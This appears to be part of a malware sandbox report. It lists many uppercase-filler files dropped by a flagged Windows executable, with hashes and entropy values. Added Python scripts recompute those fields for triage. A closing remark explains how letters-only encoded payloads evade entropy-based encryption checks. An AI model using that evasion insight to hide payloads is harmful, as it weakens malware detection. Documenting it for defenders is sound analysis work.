Preview:NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.696508269038202
Encrypted:false
SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:0E9E92228B27AD7E7B4449467A529B0C
SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:false
Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.685942106278079
Encrypted:false
SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:false
Preview:PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.6969712158039245
Encrypted:false
SSDEEP:24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:31CD00400A977C512B9F1AF51F2A5F90
SHA1:3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:false
Preview:

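The complete dropped-file records in this part of the report share one shape: 1026 bytes of ASCII, a single 1024-character line of uppercase letters terminated by CRLF, and an entropy between 4.685 and 4.698 bits. Uniformly random text over a 26-letter alphabet has an entropy of log2(26) = 4.700 bits, so those values are exactly what such content produces, and the Entropy (8bit) field together with the byte alphabet is enough to sort these files apart from the other artifacts in a sandbox's dropped-file export. The script below is an added example and is not code from Joe Sandbox or from the analysed sample: it recomputes the report's Size, Entropy (8bit) and MD5/SHA-1/SHA-256/SHA-512 fields for a file, verifies a file against the values a record lists, and flags files matching the pattern above. The `FileRecord` class, the 0.05-bit tolerance and the `constructed_filler` stand-ins (deterministic pseudo-random letters; the real dropped files are not embedded) are assumptions made for the example.

```python
"""Recompute and triage the dropped-file fields shown in the report above.

Added example, not Joe Sandbox code and not code from the analysed sample.
Rebuilds Size, Entropy (8bit) and the MD5/SHA-1/SHA-256/SHA-512 fields for a
file and flags the shape the report's complete records share: 1026 bytes,
one 1024-character line of A-Z followed by CRLF, entropy about 4.69 bits.
Uniformly random text over 26 letters has entropy log2(26) = 4.700 bits.
"""
import hashlib
import math
import random
from collections import Counter
from dataclasses import dataclass

LETTERS = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
UPPER = frozenset(LETTERS)
LOG2_26 = math.log2(26)  # 4.700 bits per byte for uniformly random A-Z text


@dataclass(frozen=True)
class FileRecord:  # field names mirror the report; the class itself is an assumption
    size: int
    entropy: float
    md5: str
    sha1: str
    sha256: str
    sha512: str
    uppercase_filler: bool


def shannon_entropy(data: bytes) -> float:
    """Byte-wise Shannon entropy in bits per byte, i.e. the report's 'Entropy (8bit)'."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_like_uppercase_filler(data: bytes, tolerance: float = 0.05) -> bool:
    """True when `data` is one 1024-byte line of A-Z ending in CRLF whose entropy is
    within `tolerance` bits of log2(26). Alphabet and entropy are both checked:
    b"A" * 1024 + CRLF has the right alphabet but an entropy near zero."""
    if not data.endswith(b"\r\n"):
        return False
    body = data[:-2]
    if len(body) != 1024 or not set(body) <= UPPER:
        return False
    return abs(shannon_entropy(data) - LOG2_26) <= tolerance


def describe(data: bytes) -> FileRecord:
    """Compute the same fields the report lists for a dropped file (hashes upper-case,
    as the report prints them)."""
    return FileRecord(
        size=len(data),
        entropy=shannon_entropy(data),
        md5=hashlib.md5(data).hexdigest().upper(),
        sha1=hashlib.sha1(data).hexdigest().upper(),
        sha256=hashlib.sha256(data).hexdigest().upper(),
        sha512=hashlib.sha512(data).hexdigest().upper(),
        uppercase_filler=looks_like_uppercase_filler(data),
    )


def matches_report(data: bytes, size: int, md5: str, sha256: str) -> bool:
    """Check a file recovered from the sandbox against a record's Size/MD5/SHA-256."""
    rec = describe(data)
    return rec.size == size and rec.md5 == md5.upper() and rec.sha256 == sha256.upper()


def constructed_filler(seed: int) -> bytes:
    """Constructed stand-in for one of the dropped files (the real files are not
    embedded here): 1024 pseudo-random uppercase letters plus CRLF, 1026 bytes."""
    rng = random.Random(seed)
    return bytes(rng.choice(LETTERS) for _ in range(1024)) + b"\r\n"


if __name__ == "__main__":
    for seed in range(3):
        rec = describe(constructed_filler(seed))
        print(f"size={rec.size} entropy={rec.entropy:.4f} "
              f"filler={rec.uppercase_filler} md5={rec.md5}")
    # A PE header or any binary blob fails the alphabet check and is not flagged.
    print(describe(b"MZ\x90\x00" + bytes(range(256)) * 4).uppercase_filler)
```

Run `describe` over the files the sandbox lets you download and compare `sha256` with the value the corresponding record lists; a mismatch means the file on disk is not the one the report describes. Files that pass `looks_like_uppercase_filler` all belong to this 1026-byte family and can be set aside so that attention goes to the remaining dropped files.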

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.6980379859154695
Encrypted:false
SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:false

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.6980379859154695
Encrypted:false
SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:false

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.6980379859154695
Encrypted:false
SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:false

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.698473196318807
Encrypted:false
SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:4D0D308F391353530363283961DF2C54
SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:false

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.698473196318807
Encrypted:false
SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:4D0D308F391353530363283961DF2C54
SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:false

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.69422273140364
Encrypted:false
SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:A686C2E2230002C3810CB3638589BF01
SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:false

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.702263764575455
Encrypted:false
SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
MD5:1680F18135FD9FE517865D4B70BCA69F
SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
Malicious:false

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.702263764575455
Encrypted:false
SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
MD5:1680F18135FD9FE517865D4B70BCA69F
SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
Malicious:false

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.696178193607948
Encrypted:false
SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:960ECA5919CC00E1B4542A6E039F413E
SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                   Preview:
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.701188456968639
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                                                                                                                                                                                  MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                                                                                                                                                                                  SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                                                                                                                                                                                  SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                                                                                                                                                                                  SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM
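                                                                                                                                                                                                                                   The record above reports Entropy (8bit) 4.7012 and Encrypted:false for a 1026-byte file whose preview is 1024 random-looking uppercase letters. The two numbers are consistent, and the check below shows why: Shannon entropy of text drawn from a 26-letter alphabet cannot exceed log2(26) = 4.7004 bits per byte, and the reported value sits just above that ceiling only because the CRLF terminator (Size 1026 = 1024 letters + 2 bytes) adds two more byte values. A sandbox "Encrypted" heuristic keyed on entropy therefore does not fire on uppercase-only padding, whereas a genuinely encrypted or compressed buffer of the same size lands near 7.8. This is an added example written for this page, not code from the Joe Sandbox report or from the analysed sample; the preview text is copied from the record above, the 7.0 bits-per-byte cut-off is an illustrative assumption (Joe Sandbox does not publish its exact threshold), and the random buffer used for contrast is constructed with a seeded generator.

```python
"""Added example (not part of the Joe Sandbox report): reproduce the
'Entropy (8bit)' / 'Encrypted' heuristics for one of the dropped 1026-byte files."""
import math
import random
from collections import Counter

# Ceiling for any text restricted to the 26 uppercase letters.
LOG2_26 = math.log2(26)  # 4.7004...

# Illustrative cut-off, assumed for this example; the report does not state
# which threshold Joe Sandbox uses for its "Encrypted" flag.
ENCRYPTED_THRESHOLD_BITS = 7.0

# Preview text copied from the record above (file with
# MD5 18A3248DC9C539CCD2C8419D200F1C4D); the report shows the first 1024 bytes.
PREVIEW = (
    "GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXU"
    "CDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZ"
    "WKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJ"
    "HMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAA"
    "HATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPU"
    "PGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZ"
    "BVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKY"
    "RIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM"
)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the quantity the
    report's 'Entropy (8bit)' column describes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def analyse_dropped_file(body: bytes) -> dict:
    """Summarise one file the way a triage script would: size, alphabet,
    entropy, and whether an entropy heuristic would call it encrypted."""
    alphabet = set(body)
    entropy = shannon_entropy(body)
    return {
        "size": len(body),
        "alphabet_size": len(alphabet),
        "uppercase_only": alphabet <= set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"),
        "entropy": entropy,
        "looks_encrypted": entropy > ENCRYPTED_THRESHOLD_BITS,
    }


def report_consistency_check() -> dict:
    """Rebuild the dropped file as 'preview + CRLF' (File Type says CRLF line
    terminators; Size 1026 = 1024 + 2), and compare it with the bare preview
    and with a constructed uniformly random buffer of the same length."""
    preview = PREVIEW.encode("ascii")
    full_file = preview + b"\r\n"
    # Constructed contrast input: what an encrypted/compressed payload of the
    # same size looks like to the same heuristic (seeded so the run is repeatable).
    rng = random.Random(1337)
    random_blob = bytes(rng.getrandbits(8) for _ in range(len(full_file)))
    return {
        "preview": analyse_dropped_file(preview),
        "full": analyse_dropped_file(full_file),
        "random": analyse_dropped_file(random_blob),
    }


if __name__ == "__main__":
    for name, info in report_consistency_check().items():
        print(f"{name:8s} size={info['size']:5d} alphabet={info['alphabet_size']:3d} "
              f"entropy={info['entropy']:.4f} encrypted={info['looks_encrypted']}")
    print(f"log2(26) ceiling for uppercase-only text: {LOG2_26:.4f}")
```

                                                                                                                                                                                                                                   The practical reading for triage: an entropy around 4.7 on a file that "looks random" is a signature of a 26-symbol alphabet, not of weak randomness, so do not treat Encrypted:false as evidence that such a drop is benign; the same capping effect lets base32- or letters-only encoded payloads slip under an entropy threshold tuned for raw ciphertext.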
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.695505889681456
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
                                                                                                                                                                                                                                  MD5:3E1BF32E65136B415337727A75BB2991
                                                                                                                                                                                                                                  SHA1:4754D2DD51AEC8E287F0F298F5A81349578DEB56
                                                                                                                                                                                                                                  SHA-256:448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
                                                                                                                                                                                                                                  SHA-512:16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                   Preview:
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.698193102830694
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                                                                                                                                                                                  MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                                                                                                                                                                                  SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                                                                                                                                                                                  SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                                                                                                                                                                                  SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                   Preview:
